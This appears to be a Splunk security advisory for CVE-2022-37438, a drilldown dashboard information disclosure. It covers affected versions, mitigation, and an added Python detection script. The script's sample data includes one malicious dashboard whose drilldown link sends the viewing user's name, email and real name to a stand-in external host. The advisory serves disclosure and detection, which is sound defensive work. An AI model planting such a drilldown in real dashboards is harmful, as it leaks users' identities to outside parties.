Advisory ID: SVD-2022-0802
Published: 2022-08-16
Last Update: 2022-08-16
CVE ID: CVE-2022-37438
Bug ID: SPL-221531
CWE: CWE-200
CVSSv3.1 Score: 2.6, Low
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Security Content: Splunk account discovery drilldown dashboard disclosure
In the Splunk Enterprise versions listed in the table below, an authenticated user can craft a dashboard that leaks information about other Splunk users (for example, username, email address, and real name) when another user visits it and follows a drilldown. Exploiting the issue requires an account that can create and share dashboards in Splunk Web.
For Splunk Enterprise, upgrade versions to 8.1.11, 8.2.7.1, 9.0.1, or higher.
For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.
Product | Version | Component | Affected Version | Fixed Version |
---|---|---|---|---|
Splunk Enterprise | 8.1 | Splunk Web | 8.1.10 and lower | 8.1.11 |
Splunk Enterprise | 8.2 | Splunk Web | 8.2.0 to 8.2.7 | 8.2.7.1 |
Splunk Enterprise | 9.0 | Splunk Web | 9.0.0 | 9.0.1 |
Splunk Cloud Platform | - | Splunk Web | 8.2.2203.4 and lower | 9.0.2205 |
You can mitigate this vulnerability by restricting permissions on dashboards and on the knowledge objects that drive them. Limiting which roles can create and share dashboards limits who can plant a malicious drilldown; limiting read access to a dashboard limits which users can be exposed to it.
Splunk account discovery drilldown dashboard disclosure
This search uses the REST API to query dashboard definitions for environment tokens (such as $env:user$) embedded in drilldown URL options, which can leak information about the users who visit the dashboard. If the search returns results, investigate whether exposing those environment tokens in the URL was intended.
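The following script is an added example written for this page; it is not Splunk's detection search or Splunk product code. It reproduces offline the check the search performs: parse the Simple XML that the REST endpoint /servicesNS/-/-/data/ui/views returns in its eai:data field, and flag drilldown values that embed the identity tokens $env:user$, $env:user_email$ or $env:user_realname$. The three dashboards, the collector.example.net hostname and the app paths are constructed sample data; one dashboard is the malicious pattern described above, one is a benign drilldown that uses only $env:app$, and one copies the identity into a custom token before using it in a link.

```python
"""Offline check for Simple XML dashboards whose drilldowns leak viewer identity.

Constructed example; not Splunk's detection search or product code. It emulates
the logic of that search over the XML that the REST endpoint
/servicesNS/-/-/data/ui/views returns in the eai:data field.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Simple XML environment tokens that resolve to the *viewing* user's identity.
IDENTITY_TOKENS = ("$env:user$", "$env:user_email$", "$env:user_realname$")

# Drilldown child elements whose text can carry a token into a URL.
DRILLDOWN_VALUE_TAGS = ("link", "set", "eval")

# Constructed stand-in for eai:data of three dashboards (not real Splunk data).
SAMPLE_VIEWS = {
    # Malicious: sends the viewer's username, email and real name off-host.
    "leaky_dashboard": """<dashboard>
  <label>Overview</label>
  <row><panel><table>
    <search><query>index=_internal | stats count by sourcetype</query></search>
    <drilldown>
      <link target="_blank">https://collector.example.net/?u=$env:user$&amp;e=$env:user_email$&amp;n=$env:user_realname$</link>
    </drilldown>
  </table></panel></row>
</dashboard>""",
    # Benign: $env:app$ and a click token, staying inside the local app.
    "benign_dashboard": """<dashboard>
  <label>Errors</label>
  <row><panel><chart>
    <search><query>index=_internal log_level=ERROR | timechart count</query></search>
    <drilldown>
      <link>/app/$env:app$/error_detail?form.when=$click.value$</link>
    </drilldown>
  </chart></panel></row>
</dashboard>""",
    # Indirect: identity is copied into a custom token first, then used in a link.
    "indirect_dashboard": """<dashboard>
  <label>Hosts</label>
  <row><panel><table>
    <search><query>index=_internal | stats count by host</query></search>
    <drilldown>
      <set token="viewer">$env:user$</set>
      <link>/app/search/host_detail?form.viewer=$viewer$</link>
    </drilldown>
  </table></panel></row>
</dashboard>""",
}


def is_external_url(value):
    """True when the value is an absolute URL with a host (data leaves Splunk Web)."""
    parts = urlsplit(value)
    return bool(parts.scheme and parts.netloc)


def find_identity_leaks(views):
    """Return one finding per drilldown value that embeds an identity token.

    views: mapping of dashboard name -> Simple XML source (the eai:data text).
    """
    findings = []
    for name, xml_text in views.items():
        root = ET.fromstring(xml_text)
        for drilldown in root.iter("drilldown"):
            for elem in drilldown.iter():
                value = (elem.text or "").strip()
                if elem.tag not in DRILLDOWN_VALUE_TAGS or not value:
                    continue
                tokens = [t for t in IDENTITY_TOKENS if t in value]
                if tokens:
                    findings.append({
                        "view": name,
                        "element": elem.tag,
                        "tokens": tokens,
                        "external": is_external_url(value),
                        "value": value,
                    })
    return findings


def leaky_views(views):
    """Names of dashboards with at least one finding, in document order."""
    seen = []
    for f in find_identity_leaks(views):
        if f["view"] not in seen:
            seen.append(f["view"])
    return seen


if __name__ == "__main__":
    for f in find_identity_leaks(SAMPLE_VIEWS):
        where = "external URL" if f["external"] else "local value"
        print(f"{f['view']}: <{f['element']}> carries {', '.join(f['tokens'])} ({where})")
```

Running it reports leaky_dashboard (all three tokens in an external URL) and indirect_dashboard (the set element, a local value), and nothing for benign_dashboard. The indirect case is why the check inspects set and eval elements as well as link: a token populated from $env:user$ inside the drilldown can be used in a URL without the identity token ever appearing in the link text itself, so a search that only matches the link would miss it.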
Splunk rates the severity as Low, 2.6, with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N. If the Splunk Enterprise instance does not run Splunk Web, it is not affected and the vulnerability is informational.
Credit: Eric LaMothe at Splunk